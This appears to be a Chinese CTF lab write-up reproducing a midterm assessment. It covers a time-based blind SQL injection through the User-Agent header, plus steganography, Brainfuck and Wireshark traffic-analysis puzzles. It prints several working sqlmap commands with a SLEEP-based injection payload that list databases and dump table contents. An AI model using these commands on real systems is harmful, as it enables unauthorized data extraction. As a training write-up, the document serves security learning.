期中考核复现

web

 简简单单的sql

需要寻找SQL,考核的时候dirsearch扫描到了login.php

是个登录框,进行了爆破尝试,密码用admin,尝试在用户名出进行注入点的判断

但是回显 NO SQL,一开始我以为是盲注,结果确实是盲注,只是不在这个页面

已经明确是SQL的话,利用sqlmap来扫描一下,发现常规扫描没有发现,再结合登录页面,说明要在登录的后的页面进行注入,输入用户名和密码进行抓包

下载POST传参的信息,利用sqlmap进行扫描,要设置测试的等级(测试等级到3就够用,要到5也没意见)前面对于sqlmap的了解不多,用这题也可以好好学习一下

sqlmap -r xxxxx --level 3

通过扫描知道注入类型和payload(前面扫描出来都不知道怎么利用)

在UA头扫描发现的,所以在UA头处进行时间盲注,指定UA头

sqlmap -r /home/kali/桌面/1.txt --level 5 --headers="User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0' AND (SELECT 3968 FROM (SELECT(SLEEP(5)))Gujs)-- KBZW" --dbs  

爆出所有数据库

爆现在所处的数据库

sqlmap -r /home/kali/桌面/1.txt --level 5 --headers="User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0' AND (SELECT 3968 FROM (SELECT(SLEEP(5)))Gujs)-- KBZW" --current-db

爆表

sqlmap -r /home/kali/桌面/1.txt --level 5 --headers="User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0' AND (SELECT 3968 FROM (SELECT(SLEEP(5)))Gujs)-- KBZW" -D challenges --tables

 存在两张表,需要一张一张看

在第一张表里,爆字段

sqlmap -r /home/kali/桌面/1.txt --level 5 --headers="User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0' AND (SELECT 3968 FROM (SELECT(SLEEP(5)))Gujs)-- KBZW" -D challenges -T user_agents --columns

长度为40的字段就是flag

查询字段内容

sqlmap -r /home/kali/桌面/1.txt --level 5 --headers="User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0' AND (SELECT 3968 FROM (SELECT(SLEEP(5)))Gujs)-- KBZW" -D challenges -T user_agents -C user_agent --dump

拿到flag

Misc

Xjpg

下载附件,题目提示为f5,猜测f5隐写

 用F5-steganography进行解密

打开output.txt查看

乱码,用010editor打开

pk头,把文件改为zip,解压后查看文本

brainfuck解码

流量分析1 

下载附件,用wireshark进行分析

导出http对象,发现666.zip

给了很多文件

关于png的头部为:89 50 4E 47

尾部为:AE 42 60 82

查看6个文件,发现1.txt和6.txt分别为头部和尾部,说明6个txt为一张png

把16进制导入010中,另存为png图片,得到二维码

扫描二维码得到flag

流量分析3

下载得到rar文件,重命名一下,解压

flag应该在flag.docx文件中, 但是有加密

流量分析是key,那么流量分析拿密钥

看见usb,应该是键鼠流量分析

the key is qazwsxedcrfv

解密flag.docx

流量分析2

下载附件,用wireshark打开,是sql盲注的流量分析

过滤包含flag的http

根据盲注是一个一个字符去尝试,当从(1,1)到(2,1)时,说明第一个字符正确

102对照ACill表 是f,依次对照

flag为flag{skysql_is_very_cool!233}

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值